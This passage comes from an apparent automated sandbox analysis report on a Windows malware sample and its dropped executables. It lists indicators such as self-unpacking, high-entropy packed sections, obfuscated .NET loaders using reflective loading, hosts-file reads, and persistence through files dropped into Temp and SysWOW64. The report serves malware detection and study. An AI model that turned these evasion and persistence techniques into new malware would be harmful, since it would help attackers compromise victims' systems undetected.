                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\BackgroundTransferHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\BackgroundTransferHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: GNXG5XLBEH.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: GNXG5XLBEH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: profapi.pdb% source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbA source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.362609649.000000000549A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbK source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdb source: GNXG5XLBEH.exe, GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: =C:\tuxifazim\miwoto.pdbh source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.362658267.0000000003630000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.364317064.0000000003630000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: /C:\siwuxidugo_jezupih_cokon\keb5_bajayojagih vahu\cofugu.pdbh source: GNXG5XLBEH.exe, 00000000.00000000.237874920.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000000.00000002.243174357.0000000000401000.00000020.00020000.sdmp, GNXG5XLBEH.exe, 00000001.00000000.241196595.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000002.338879338.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000012.00000000.332813687.0000000000401000.00000020.00020000.sdmp, ttfssdi, 00000013.00000000.336956368.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdb source: 6B9B.exe, 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdbm source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: 1C:\wayevuwuku\98\caharesiyopa_p.pdbh source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\wayevuwuku\98\caharesiyopa_p.pdb source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdbh source: 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbS source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: shlwapi.pdbG source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\tuxifazim\miwoto.pdb source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeUnpacked PE file: 28.2.6BA5.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeUnpacked PE file: 30.2.77CC.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeUnpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeUnpacked PE file: 28.2.6BA5.exe.400000.0.unpack .text:ER;.data:W;.geravic:W;.pude:W;.vup:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeUnpacked PE file: 30.2.77CC.exe.400000.0.unpack .text:ER;.data:W;.hex:W;.suba:W;.vez:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeUnpacked PE file: 43.2.evjgtzc.exe.400000.0.unpack .text:ER;.data:W;.hex:W;.suba:W;.vez:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpackerShow sources
                      Source: 6E36.exe.4.dr, Univesity_Grade_Calculator/Form1.cs.Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0074042E push esi; ret
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_007403C9 push esi; ret
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00643634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0041A6F9 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0041A14B push C00086B6h; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0041A3E9 push C00086B6h; retf
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0041A5EC push eax; iretd
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0043DFF4 push ebp; retf 0042h
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00435AD0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 2D8F.exe.4.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: GNXG5XLBEH.exeStatic PE information: section name: .vaxego
                      Source: GNXG5XLBEH.exeStatic PE information: section name: .gig
                      Source: GNXG5XLBEH.exeStatic PE information: section name: .hojotew
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name: .28gybOo
                      Source: 1523.exe.4.drStatic PE information: section name: .adata
                      Source: 2D8F.exe.4.drStatic PE information: section name: .didata
                      Source: 4955.exe.4.drStatic PE information: section name: _RDATA
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name: .2pZFPAB
                      Source: 54D0.exe.4.drStatic PE information: section name: .adata
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name: .kujN2o2
                      Source: 6471.exe.4.drStatic PE information: section name: .adata
                      Source: 6B9B.exe.4.drStatic PE information: section name: .tuv
                      Source: 6B9B.exe.4.drStatic PE information: section name: .bezax
                      Source: 6B9B.exe.4.drStatic PE information: section name: .lelepar
                      Source: 6BA5.exe.4.drStatic PE information: section name: .geravic
                      Source: 6BA5.exe.4.drStatic PE information: section name: .pude
                      Source: 6BA5.exe.4.drStatic PE information: section name: .vup
                      Source: 77CC.exe.4.drStatic PE information: section name: .hex
                      Source: 77CC.exe.4.drStatic PE information: section name: .suba
                      Source: 77CC.exe.4.drStatic PE information: section name: .vez
                      Source: 13C.exe.4.drStatic PE information: section name: _RDATA
                      Source: ttfssdi.4.drStatic PE information: section name: .vaxego
                      Source: ttfssdi.4.drStatic PE information: section name: .gig
                      Source: ttfssdi.4.drStatic PE information: section name: .hojotew
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .hex
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .suba
                      Source: evjgtzc.exe.30.drStatic PE information: section name: .vez
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 54D0.exe.4.drStatic PE information: real checksum: 0x36d1e8 should be: 0x37985e
                      Source: 6471.exe.4.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: 74DE.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x14e78b
                      Source: 1523.exe.4.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: 8058.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.97280495233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715965774
                      Source: initial sampleStatic PE information: section name: entropy: 7.90405352991
                      Source: initial sampleStatic PE information: section name: entropy: 7.99357874577
                      Source: initial sampleStatic PE information: section name: entropy: 7.7922746648
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.23071246858
                      Source: initial sampleStatic PE information: section name: .2pZFPAB entropy: 7.9174117718
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.9726708833
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.9846657802
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96432404195
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.97280495233
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96432404195
                      Source: 8058.exe.4.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.2.8058.exe.d00000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 31.0.8058.exe.d00000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ttfssdiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D9EC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6BA5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeFile created: C:\Users\user\AppData\Local\Temp\evjgtzc.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6B9B.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\54D0.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4955.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6E36.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\77CC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1523.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\74DE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ttfssdiJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5BBC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6471.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2205.exeJump to dropped file
